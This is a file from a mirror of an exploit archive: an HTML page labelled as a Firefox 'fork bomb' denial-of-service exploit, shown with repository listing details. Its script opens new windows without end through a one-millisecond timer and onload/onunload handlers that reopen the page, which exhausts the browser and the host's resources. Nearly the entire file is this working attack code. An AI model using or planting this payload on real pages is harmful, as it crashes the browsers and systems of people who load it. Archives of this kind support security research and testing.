exploit-db-mirror/exploits/windows/dos/12492.html
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

13 lines
No EOL
439 B
HTML

<html>
<script>
var a = ('javascript:"<html><head><title>Dr_IDE\s FireFox Fork Bomb!</title></head><body onunload=\\"javascript:window.open(window.location);window.open(window.location)\\" onload=\\"javascript:window.open(window.location);window.open(window.location)\\"></body></html>"');
loop1();
function loop1()
{
window.open(a);
setInterval(loop1,1);
}
</script>
<body onload="javascript:loop1()"></body>
</html>